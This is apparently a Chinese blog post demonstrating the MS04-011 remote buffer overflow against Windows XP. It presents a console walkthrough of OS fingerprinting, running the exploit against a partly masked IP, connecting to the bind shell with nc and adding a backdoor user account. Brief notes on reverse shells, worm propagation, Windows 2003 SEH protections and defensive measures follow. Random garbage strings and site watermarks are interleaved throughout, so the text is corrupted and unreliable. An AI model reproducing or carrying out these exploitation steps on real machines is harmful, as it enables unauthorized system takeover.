系统漏洞溢出攻击实例

x
x-h#?.j}(N0rZ+n0我们来看一下以前比较精典的一个溢出实例ms04011溢出：

Microsoft Windows XP [版本 5.1.2600] IXPUB技术博客o
]
jv+B:IR
(C) 版权所有 1985-2001 Microsoft Corp. 
g}4oMZ0C:\windows\system32\cd\ 

C:\>
0f.E7Y [+lux;^8~0C:\>getos 2**.159.31.96   （判断操作系统）IXPUB技术博客,q
@/D&q J+T{ZS

---------------------------- IXPUB技术博客5C JYv i
THCsmbgetOS v0.1 - gets gro 

by Johnny Cyberpunk ( IXPUB技术博客d;NaQS7AeQ
---------------------------- 

[*] Connecting Port 139.... IXPUB技术博客(u6A
`Eyf
[*] Sending session request. IXPUB技术博客&v"A"r.YCz.R%z6nL#e
[*] Sending negotiation requ IXPUB技术博客f,AOD)NQ-yE
[*] Sending setup account re 
2Yj9nsP1s1T(V W0[*] Successful.... IXPUB技术博客U/ljP^p

2Eo'}M%u5Hw0v0Remote OS: IXPUB技术博客w4[7iR:S iYX+f
---------- IXPUB技术博客7A2BiJl[R3gV
WORKGROUP IXPUB技术博客\D QHo!];T#xu
Windows 2000 LAN Manager IXPUB技术博客:UGm#k2bRr
KS
Windows 5.1 IXPUB技术博客!X+aSzL&}"x'B

:f%v's:J` d0C:\> IXPUB技术博客L7F:tb0D3V"LC$i
C:\>ms04011 1 2**.159.31.96 (溢出格式)
w[5Am9lE\ O0shellcode size 404 
#jX%`Ho.I0Ret value = 1727 IXPUB技术博客} D
WGN&t'\u"k_

C:\> 
5T;}oSXj J8u0C:\>nc 2**.159.31.96 1234  (nc进行连接)IXPUB技术博客k9_/{|8h(N(J
{-s+@
Microsoft Windows XP [版本 5.1.2600] 
B,t$G9g7z6\-U4YM}0(C) 版权所有 1985-2001 Microsoft Corp. IXPUB技术博客L \.s7w2q&Abf.Qh

D:\WINDOWS\system32> (得到目标机shell)IXPUB技术博客fZM'R]"Z

{#Oo!F'Q.Wgn0IXPUB技术博客b4\E3@z4kK FX2FX8L
D:\WINDOWS\system32>net user test  test /add IXPUB技术博客(Kw k1{)p3j0j
net user test test /add 
4]ES]lET}0命令成功完成。  (建立用户)IXPUB技术博客[a)r^+G4K2jq

H`9|I1pM0上面只是简单演示了一下溢出过程，上例是正向溢出，只是直接溢出后用nc进行连接，还可以反向溢出，反向溢出一般用来突破防火墙，先用nc在本机监听一个端口，等待反向溢出的服务器连接过来从而得到一个system权限的shell。对于溢出还有很多，如iis、mso4045、ms04049、ms05039、ms05051、ms06061等还有一些精典的应用程序远程溢出，如未打sp3的mssql远程溢出可以直接得到系统权限。还有imail服务也一样可以通过远程溢出获得系统权限。还有很多病毒如冲击波、震荡波等病毒都是利用的rpc和lsass溢出漏洞，在感染一台机器后又不断的以此机器为节点扫描网络中的其它存在漏洞的机器进行溢出植入病毒程序，这样不断的繁殖下去。IXPUB技术博客^-`7pgl+[-NT

M:B1R8u)\0不过在windiws2003下溢出就无用武之地了，因为在2003的保护机制里面还有一个技术是可控的SEH处理函数指针，2003中结构化异常处理例程注册后，它的函数指针会保存在模块中的一个叫Load Configuration Directory的地址列表中，如果函数返回时系统发现堆栈中的Cookie发生了改变，视为溢出，系统就会查看当前线程相关的SEH中是否有相应的处 理函数指针，有的话，系统将该指针与已经注册过函数的地址列表进行对照，如果没有发现匹配的，而且处理函数指针在堆栈中，异常处理函数就不运行。如果该处 理函数指针位于已加载的各个DLL模块地址范围只外，或堆中，处理函数会被执行，这种可控制的异常处理技术就会使传统的覆盖SEH指针的方法失败。虽然可以用已经加载模块以外的地址来覆盖SHE但在远程溢出中仍显得无力。IXPUB技术博客3E9tJ1i
~

mi'W1g2G Q0我们再来看看本地溢出，本地溢出主要用来进行权限提升，前面的serv-u的本地溢出已经注入中讲解了，我们现在再来看一下本地的一个特权提升漏洞，如图：

通过执行本地溢出直接从user用户提升到系统权限。IXPUB技术博客X9`!r X/C

9V,tQi8H0对溢出攻击的安全防范：IXPUB技术博客t?2^ b{:w(Y&R

*Hlf0U:J;b0d2D5ay0关闭139端口，停掉icp/ip netbios服务。IXPUB技术博客%\b~}`;T)U

在本地连接的属性窗口中tcp/ip协议中的高级选项里“禁用tcp/ip上的netbios(s)”因为很多溢出都是利用的这个通道。

,RZ s/N_0安装防火墙是必要的。IXPUB技术博客/Ef.QB d$Z8\T9M

打上重要漏洞的补丁（如冲击波补丁、震荡波补丁），并开启系统的自动更新功能。IXPUB技术博客8_5GlJ}"H3p

服务器使用windows2003系统。

image022